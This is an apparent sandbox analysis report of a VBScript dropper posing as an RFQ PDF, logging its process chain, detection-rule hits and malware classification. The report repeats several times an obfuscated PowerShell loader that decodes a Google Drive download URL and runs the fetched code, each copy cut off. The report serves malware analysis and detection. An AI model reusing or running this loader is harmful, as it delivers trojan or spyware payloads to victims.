Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Besprjtet Playstow Stunsail Vrangforestillingers ergotisms Idealism Overthrowing #>;$Requestionerntrenchant='Gem';<#Formanings Reaktion Randmorner Backwall protore #>;$Oplyser=$Syriacism+$host.UI; function Franarrendes($Kampucheanske){If ($Oplyser) {$Grangerizer++;}$Automobiler=$Forsnakket+$Kampucheanske.'Length'-$Grangerizer; for( $Requestioner=5;$Requestioner -lt $Automobiler;$Requestioner+=6){$Heavenward214=$Requestioner;$Ressentimentsflelsers+=$Kampucheanske[$Requestioner];$Spindleshanks='Nougatfarvede255';}$Ressentimentsflelsers;}function Forbindingers($Sweateren){ . ($Leukophoresis) ($Sweateren);}$Modulariteten85=Franarrendes 'Rum eM lunnoNo anzKonkui Zircl Enerl AnnaaOffgo/ Expe ';$Modulariteten85+=Franarrendes 'Forha5Genn..Olief0Munde Qeth(kamleWD speiW.rlonIag tdGrundoTyd.lwNordis.inds St rN UndeTVolun Aphyl1Found0Orrtr. Fart0Dunel;Attem roomW.ettiiKonomnRe dd6 Anab4 Ach ; Tand S.mpsxChamp6Torve4Snkni;N.mph Carbor Vaa vUnder:forby1Agnat3Foreb1Hydro. nond0 M ga)Bolig FilmsG B koeSviencM notkDesmooBet t/Sp ci2Disfo0Frak,1Curvi0klim 0Enfol1Na ur0 Fops1 Sni TandpF mageisobrarAftrae,ofanf IndioInvarxSaftf/Skole1Sky r3Yderp1 Para.adven0Fall ';$Regnetegnet=Franarrendes 'NiffeU SonoSPreleEStamsrLoz n-FrontAVideoGPo.uleDi denFejletNowel ';$Delggelses=Franarrendes 'BrookhTsnintUnpertunasspOdon sCentr: aan/ Bygn/Pr.grdD,sgerUdnytiFlsomv Non eWoods.OmheggDhurroSkr aoInflegHelpilH lefeLinne.photocNo.gao iphom varm/Avl.suRebubc Abru?I.kvieKomp,xKo tep.piskoOver rBriskt En e=Prosed fvnnounig,wBu.den Fjenl ArusoCen raSaggidRet r&Klenei OmvedDof m= ktio1SaltiO emouB.otlcBac sV EmulAAppetKPseu,uRespicPugenyTim rFCrocugAnkomsKlemry verslS,jlgES ewa0Aaref-F remRKendiUOnla 3Wa rguElvilZ Klbnk DiffN SdnidBog,veSemid2 .emia.ittelsyfilM SemiJUne lPOmdig ';$Coleopteroid=Franarrendes 'Coff >Disge ';$Leukophoresis=Franarrendes 'V,ticiWoundECi.enxSynon ';$Requestionernkassoerne='Papyroplastics';$Kontagis='\Platyhelminthic195.End';Forbindingers (Franarrendes 'Knivs$SpiseGG ssel SkijoL,nkbBRa ziA RemrlD.gab: V,ewDChinbe AcuicY,lloaPeachRSnoenbRhabdoMen oN Mi.tYantihl Sta.aFavo.TU stoESystedDextr= Coar$RemusEEn.rvNTransvsan.s:Gtebaa SikkpP ethPDi pedPunteAStunnTforlgABackn+Sekul$.romaK,ermuOHazanNGreevtIndvaARiob,gCymbeIGenfoSTraum ');Forbindingers (Franarrendes 'Cuisi$C,liiGlingeL aradO.ommebwhip aReboulLabio: FriglDatasILobelTCurt hfrygtOti.anP Brn hJeq eI FlyvlrussiORektou eskysSkudd=Be ry$Sabr dyokeaeLachrlKie,eGArbejgTergiE FrazL IrrusInquieArt iS.orma.Maghissm gepIndviLU affISaddutLden.(Rea i$Tr,ckczigzaOUdestlKar oe ieclOlaspePPelortRegnlEBaronrNatioO CereIKogendPark,) Inct ');Forbindingers (Franarrendes 'Hu,ba[ ,nteN lassE GuiltPedan.inse.sEnergEH vedrGnistvDivi.iIn,rtCUngd efortipFun,oO AffaICloamnCompitEpichmBugh AB.rneNBarquaNonutG AltaEAnaerrUnpro]Arbej: vndg: LumbSSparsERentec ,nteu SemirWigeoI SlukTchokiy Mu kPGolemRSpe c
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Besprjtet Playstow Stunsail Vrangforestillingers ergotisms Idealism Overthrowing #>;$Requestionerntrenchant='Gem';<#Formanings Reaktion Randmorner Backwall protore #>;$Oplyser=$Syriacism+$host.UI; function Franarrendes($Kampucheanske){If ($Oplyser) {$Grangerizer++;}$Automobiler=$Forsnakket+$Kampucheanske.'Length'-$Grangerizer; for( $Requestioner=5;$Requestioner -lt $Automobiler;$Requestioner+=6){$Heavenward214=$Requestioner;$Ressentimentsflelsers+=$Kampucheanske[$Requestioner];$Spindleshanks='Nougatfarvede255';}$Ressentimentsflelsers;}function Forbindingers($Sweateren){ . ($Leukophoresis) ($Sweateren);}$Modulariteten85=Franarrendes 'Rum eM lunnoNo anzKonkui Zircl Enerl AnnaaOffgo/ Expe ';$Modulariteten85+=Franarrendes 'Forha5Genn..Olief0Munde Qeth(kamleWD speiW.rlonIag tdGrundoTyd.lwNordis.inds St rN UndeTVolun Aphyl1Found0Orrtr. Fart0Dunel;Attem roomW.ettiiKonomnRe dd6 Anab4 Ach ; Tand S.mpsxChamp6Torve4Snkni;N.mph Carbor Vaa vUnder:forby1Agnat3Foreb1Hydro. nond0 M ga)Bolig FilmsG B koeSviencM notkDesmooBet t/Sp ci2Disfo0Frak,1Curvi0klim 0Enfol1Na ur0 Fops1 Sni TandpF mageisobrarAftrae,ofanf IndioInvarxSaftf/Skole1Sky r3Yderp1 Para.adven0Fall ';$Regnetegnet=Franarrendes 'NiffeU SonoSPreleEStamsrLoz n-FrontAVideoGPo.uleDi denFejletNowel ';$Delggelses=Franarrendes 'BrookhTsnintUnpertunasspOdon sCentr: aan/ Bygn/Pr.grdD,sgerUdnytiFlsomv Non eWoods.OmheggDhurroSkr aoInflegHelpilH lefeLinne.photocNo.gao iphom varm/Avl.suRebubc Abru?I.kvieKomp,xKo tep.piskoOver rBriskt En e=Prosed fvnnounig,wBu.den Fjenl ArusoCen raSaggidRet r&Klenei OmvedDof m= ktio1SaltiO emouB.otlcBac sV EmulAAppetKPseu,uRespicPugenyTim rFCrocugAnkomsKlemry verslS,jlgES ewa0Aaref-F remRKendiUOnla 3Wa rguElvilZ Klbnk DiffN SdnidBog,veSemid2 .emia.ittelsyfilM SemiJUne lPOmdig ';$Coleopteroid=Franarrendes 'Coff >Disge ';$Leukophoresis=Franarrendes 'V,ticiWoundECi.enxSynon ';$Requestionernkassoerne='Papyroplastics';$Kontagis='\Platyhelminthic195.End';Forbindingers (Franarrendes 'Knivs$SpiseGG ssel SkijoL,nkbBRa ziA RemrlD.gab: V,ewDChinbe AcuicY,lloaPeachRSnoenbRhabdoMen oN Mi.tYantihl Sta.aFavo.TU stoESystedDextr= Coar$RemusEEn.rvNTransvsan.s:Gtebaa SikkpP ethPDi pedPunteAStunnTforlgABackn+Sekul$.romaK,ermuOHazanNGreevtIndvaARiob,gCymbeIGenfoSTraum ');Forbindingers (Franarrendes 'Cuisi$C,liiGlingeL aradO.ommebwhip aReboulLabio: FriglDatasILobelTCurt hfrygtOti.anP Brn hJeq eI FlyvlrussiORektou eskysSkudd=Be ry$Sabr dyokeaeLachrlKie,eGArbejgTergiE FrazL IrrusInquieArt iS.orma.Maghissm gepIndviLU affISaddutLden.(Rea i$Tr,ckczigzaOUdestlKar oe ieclOlaspePPelortRegnlEBaronrNatioO CereIKogendPark,) Inct ');Forbindingers (Franarrendes 'Hu,ba[ ,nteN lassE GuiltPedan.inse.sEnergEH vedrGnistvDivi.iIn,rtCUngd efortipFun,oO AffaICloamnCompitEpichmBugh AB.rneNBarquaNonutG AltaEAnaerrUnpro]Arbej: vndg: LumbSSparsERentec ,nteu SemirWigeoI SlukTchokiy Mu kPGolemRSpe c			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B88D2F2		1_2_00007FFD9B88D2F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B88C546		1_2_00007FFD9B88C546
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9BB0026A		1_2_00007FFD9BB0026A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_0043E988		8_2_0043E988
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_00435321		8_2_00435321
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_00433E12		8_2_00433E12
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_00437118		8_2_00437118

Source: RFQ_64182MR_PDF.R00.vbs

Initial sample: Strings found which are bigger than 50

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 7095
Source: unknown	Process created: Commandline size = 7095
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 7095			Jump to behavior

Source: amsi64_3300.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi32_5432.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3300, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5432, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winVBS@8/7@6/6

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Platyhelminthic195.End

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2060:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3696:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_goiohz1b.t1i.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_64182MR_PDF.R00.vbs"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3300
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5432

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RFQ_64182MR_PDF.R00.vbs	ReversingLabs: Detection: 26%
Source: RFQ_64182MR_PDF.R00.vbs	Virustotal: Detection: 25%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_64182MR_PDF.R00.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Besprjtet Playstow Stunsail Vrangforestillingers ergotisms Idealism Overthrowing #>;$Requestionerntrenchant='Gem';<#Formanings Reaktion Randmorner Backwall protore #>;$Oplyser=$Syriacism+$host.UI; function Franarrendes($Kampucheanske){If ($Oplyser) {$Grangerizer++;}$Automobiler=$Forsnakket+$Kampucheanske.'Length'-$Grangerizer; for( $Requestioner=5;$Requestioner -lt $Automobiler;$Requestioner+=6){$Heavenward214=$Requestioner;$Ressentimentsflelsers+=$Kampucheanske[$Requestioner];$Spindleshanks='Nougatfarvede255';}$Ressentimentsflelsers;}function Forbindingers($Sweateren){ . ($Leukophoresis) ($Sweateren);}$Modulariteten85=Franarrendes 'Rum eM lunnoNo anzKonkui Zircl Enerl AnnaaOffgo/ Expe ';$Modulariteten85+=Franarrendes 'Forha5Genn..Olief0Munde Qeth(kamleWD speiW.rlonIag tdGrundoTyd.lwNordis.inds St rN UndeTVolun Aphyl1Found0Orrtr. Fart0Dunel;Attem roomW.ettiiKonomnRe dd6 Anab4 Ach ; Tand S.mpsxChamp6Torve4Snkni;N.mph Carbor Vaa vUnder:forby1Agnat3Foreb1Hydro. nond0 M ga)Bolig FilmsG B koeSviencM notkDesmooBet t/Sp ci2Disfo0Frak,1Curvi0klim 0Enfol1Na ur0 Fops1 Sni TandpF mageisobrarAftrae,ofanf IndioInvarxSaftf/Skole1Sky r3Yderp1 Para.adven0Fall ';$Regnetegnet=Franarrendes 'NiffeU SonoSPreleEStamsrLoz n-FrontAVideoGPo.uleDi denFejletNowel ';$Delggelses=Franarrendes 'BrookhTsnintUnpertunasspOdon sCentr: aan/ Bygn/Pr.grdD,sgerUdnytiFlsomv Non eWoods.OmheggDhurroSkr aoInflegHelpilH lefeLinne.photocNo.gao iphom varm/Avl.suRebubc Abru?I.kvieKomp,xKo tep.piskoOver rBriskt En e=Prosed fvnnounig,wBu.den Fjenl ArusoCen raSaggidRet r&Klenei OmvedDof m= ktio1SaltiO emouB.otlcBac sV EmulAAppetKPseu,uRespicPugenyTim rFCrocugAnkomsKlemry verslS,jlgES ewa0Aaref-F remRKendiUOnla 3Wa rguElvilZ Klbnk DiffN SdnidBog,veSemid2 .emia.ittelsyfilM SemiJUne lPOmdig ';$Coleopteroid=Franarrendes 'Coff >Disge ';$Leukophoresis=Franarrendes 'V,ticiWoundECi.enxSynon ';$Requestionernkassoerne='Papyroplastics';$Kontagis='\Platyhelminthic195.End';Forbindingers (Franarrendes 'Knivs$SpiseGG ssel SkijoL,nkbBRa ziA RemrlD.gab: V,ewDChinbe AcuicY,lloaPeachRSnoenbRhabdoMen oN Mi.tYantihl Sta.aFavo.TU stoESystedDextr= Coar$RemusEEn.rvNTransvsan.s:Gtebaa SikkpP ethPDi pedPunteAStunnTforlgABackn+Sekul$.romaK,ermuOHazanNGreevtIndvaARiob,gCymbeIGenfoSTraum ');Forbindingers (Franarrendes 'Cuisi$C,liiGlingeL aradO.ommebwhip aReboulLabio: FriglDatasILobelTCurt hfrygtOti.anP Brn hJeq eI FlyvlrussiORektou eskysSkudd=Be ry$Sabr dyokeaeLachrlKie,eGArbejgTergiE FrazL IrrusInquieArt iS.orma.Maghissm gepIndviLU affISaddutLden.(Rea i$Tr,ckczigzaOUdestlKar oe ieclOlaspePPelortRegnlEBaronrNatioO CereIKogendPark,) Inct ');Forbindingers (Franarrendes 'Hu,ba[ ,nteN lassE GuiltPedan.inse.sEnergEH vedrGnistvDivi.iIn,rtCUngd efortipFun,oO AffaICloamnCompitEpichmBugh AB.rneNBarquaNonutG AltaEAnaerrUnpro]Arbej: vndg: LumbSSparsERentec ,nteu SemirWigeoI SlukTchokiy Mu kPGolemRSpe c
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Besprjtet Playstow Stunsail Vrangforestillingers ergotisms Idealism Overthrowing #>;$Requestionerntrenchant='Gem';<#Formanings Reaktion Randmorner Backwall protore #>;$Oplyser=$Syriacism+$host.UI; function Franarrendes($Kampucheanske){If ($Oplyser) {$Grangerizer++;}$Automobiler=$Forsnakket+$Kampucheanske.'Length'-$Grangerizer; for( $Requestioner=5;$Requestioner -lt $Automobiler;$Requestioner+=6){$Heavenward214=$Requestioner;$Ressentimentsflelsers+=$Kampucheanske[$Requestioner];$Spindleshanks='Nougatfarvede255';}$Ressentimentsflelsers;}function Forbindingers($Sweateren){ . ($Leukophoresis) ($Sweateren);}$Modulariteten85=Franarrendes 'Rum eM lunnoNo anzKonkui Zircl Enerl AnnaaOffgo/ Expe ';$Modulariteten85+=Franarrendes 'Forha5Genn..Olief0Munde Qeth(kamleWD speiW.rlonIag tdGrundoTyd.lwNordis.inds St rN UndeTVolun Aphyl1Found0Orrtr. Fart0Dunel;Attem roomW.ettiiKonomnRe dd6 Anab4 Ach ; Tand S.mpsxChamp6Torve4Snkni;N.mph Carbor Vaa vUnder:forby1Agnat3Foreb1Hydro. nond0 M ga)Bolig FilmsG B koeSviencM notkDesmooBet t/Sp ci2Disfo0Frak,1Curvi0klim 0Enfol1Na ur0 Fops1 Sni TandpF mageisobrarAftrae,ofanf IndioInvarxSaftf/Skole1Sky r3Yderp1 Para.adven0Fall ';$Regnetegnet=Franarrendes 'NiffeU SonoSPreleEStamsrLoz n-FrontAVideoGPo.uleDi denFejletNowel ';$Delggelses=Franarrendes 'BrookhTsnintUnpertunasspOdon sCentr: aan/ Bygn/Pr.grdD,sgerUdnytiFlsomv Non eWoods.OmheggDhurroSkr aoInflegHelpilH lefeLinne.photocNo.gao iphom varm/Avl.suRebubc Abru?I.kvieKomp,xKo tep.piskoOver rBriskt En e=Prosed fvnnounig,wBu.den Fjenl ArusoCen raSaggidRet r&Klenei OmvedDof m= ktio1SaltiO emouB.otlcBac sV EmulAAppetKPseu,uRespicPugenyTim rFCrocugAnkomsKlemry verslS,jlgES ewa0Aaref-F remRKendiUOnla 3Wa rguElvilZ Klbnk DiffN SdnidBog,veSemid2 .emia.ittelsyfilM SemiJUne lPOmdig ';$Coleopteroid=Franarrendes 'Coff >Disge ';$Leukophoresis=Franarrendes 'V,ticiWoundECi.enxSynon ';$Requestionernkassoerne='Papyroplastics';$Kontagis='\Platyhelminthic195.End';Forbindingers (Franarrendes 'Knivs$SpiseGG ssel SkijoL,nkbBRa ziA RemrlD.gab: V,ewDChinbe AcuicY,lloaPeachRSnoenbRhabdoMen oN Mi.tYantihl Sta.aFavo.TU stoESystedDextr= Coar$RemusEEn.rvNTransvsan.s:Gtebaa SikkpP ethPDi pedPunteAStunnTforlgABackn+Sekul$.romaK,ermuOHazanNGreevtIndvaARiob,gCymbeIGenfoSTraum ');Forbindingers (Franarrendes 'Cuisi$C,liiGlingeL aradO.ommebwhip aReboulLabio: FriglDatasILobelTCurt hfrygtOti.anP Brn hJeq eI FlyvlrussiORektou eskysSkudd=Be ry$Sabr dyokeaeLachrlKie,eGArbejgTergiE FrazL IrrusInquieArt iS.orma.Maghissm gepIndviLU affISaddutLden.(Rea i$Tr,ckczigzaOUdestlKar oe ieclOlaspePPelortRegnlEBaronrNatioO CereIKogendPark,) Inct ');Forbindingers (Franarrendes 'Hu,ba[ ,nteN lassE GuiltPedan.inse.sEnergEH vedrGnistvDivi.iIn,rtCUngd efortipFun,oO AffaICloamnCompitEpichmBugh AB.rneNBarquaNonutG AltaEAnaerrUnpro]Arbej: vndg: LumbSSparsERentec ,nteu SemirWigeoI SlukTchokiy Mu kPGolemRSpe c
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Besprjtet Playstow Stunsail Vrangforestillingers ergotisms Idealism Overthrowing #>;$Requestionerntrenchant='Gem';<#Formanings Reaktion Randmorner Backwall protore #>;$Oplyser=$Syriacism+$host.UI; function Franarrendes($Kampucheanske){If ($Oplyser) {$Grangerizer++;}$Automobiler=$Forsnakket+$Kampucheanske.'Length'-$Grangerizer; for( $Requestioner=5;$Requestioner -lt $Automobiler;$Requestioner+=6){$Heavenward214=$Requestioner;$Ressentimentsflelsers+=$Kampucheanske[$Requestioner];$Spindleshanks='Nougatfarvede255';}$Ressentimentsflelsers;}function Forbindingers($Sweateren){ . ($Leukophoresis) ($Sweateren);}$Modulariteten85=Franarrendes 'Rum eM lunnoNo anzKonkui Zircl Enerl AnnaaOffgo/ Expe ';$Modulariteten85+=Franarrendes 'Forha5Genn..Olief0Munde Qeth(kamleWD speiW.rlonIag tdGrundoTyd.lwNordis.inds St rN UndeTVolun Aphyl1Found0Orrtr. Fart0Dunel;Attem roomW.ettiiKonomnRe dd6 Anab4 Ach ; Tand S.mpsxChamp6Torve4Snkni;N.mph Carbor Vaa vUnder:forby1Agnat3Foreb1Hydro. nond0 M ga)Bolig FilmsG B koeSviencM notkDesmooBet t/Sp ci2Disfo0Frak,1Curvi0klim 0Enfol1Na ur0 Fops1 Sni TandpF mageisobrarAftrae,ofanf IndioInvarxSaftf/Skole1Sky r3Yderp1 Para.adven0Fall ';$Regnetegnet=Franarrendes 'NiffeU SonoSPreleEStamsrLoz n-FrontAVideoGPo.uleDi denFejletNowel ';$Delggelses=Franarrendes 'BrookhTsnintUnpertunasspOdon sCentr: aan/ Bygn/Pr.grdD,sgerUdnytiFlsomv Non eWoods.OmheggDhurroSkr aoInflegHelpilH lefeLinne.photocNo.gao iphom varm/Avl.suRebubc Abru?I.kvieKomp,xKo tep.piskoOver rBriskt En e=Prosed fvnnounig,wBu.den Fjenl ArusoCen raSaggidRet r&Klenei OmvedDof m= ktio1SaltiO emouB.otlcBac sV EmulAAppetKPseu,uRespicPugenyTim rFCrocugAnkomsKlemry verslS,jlgES ewa0Aaref-F remRKendiUOnla 3Wa rguElvilZ Klbnk DiffN SdnidBog,veSemid2 .emia.ittelsyfilM SemiJUne lPOmdig ';$Coleopteroid=Franarrendes 'Coff >Disge ';$Leukophoresis=Franarrendes 'V,ticiWoundECi.enxSynon ';$Requestionernkassoerne='Papyroplastics';$Kontagis='\Platyhelminthic195.End';Forbindingers (Franarrendes 'Knivs$SpiseGG ssel SkijoL,nkbBRa ziA RemrlD.gab: V,ewDChinbe AcuicY,lloaPeachRSnoenbRhabdoMen oN Mi.tYantihl Sta.aFavo.TU stoESystedDextr= Coar$RemusEEn.rvNTransvsan.s:Gtebaa SikkpP ethPDi pedPunteAStunnTforlgABackn+Sekul$.romaK,ermuOHazanNGreevtIndvaARiob,gCymbeIGenfoSTraum ');Forbindingers (Franarrendes 'Cuisi$C,liiGlingeL aradO.ommebwhip aReboulLabio: FriglDatasILobelTCurt hfrygtOti.anP Brn hJeq eI FlyvlrussiORektou eskysSkudd=Be ry$Sabr dyokeaeLachrlKie,eGArbejgTergiE FrazL IrrusInquieArt iS.orma.Maghissm gepIndviLU affISaddutLden.(Rea i$Tr,ckczigzaOUdestlKar oe ieclOlaspePPelortRegnlEBaronrNatioO CereIKogendPark,) Inct ');Forbindingers (Franarrendes 'Hu,ba[ ,nteN lassE GuiltPedan.inse.sEnergEH vedrGnistvDivi.iIn,rtCUngd efortipFun,oO AffaICloamnCompitEpichmBugh AB.rneNBarquaNonutG AltaEAnaerrUnpro]Arbej: vndg: LumbSSparsERentec ,nteu SemirWigeoI SlukTchokiy Mu kPGolemRSpe c			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll			Jump to behavior
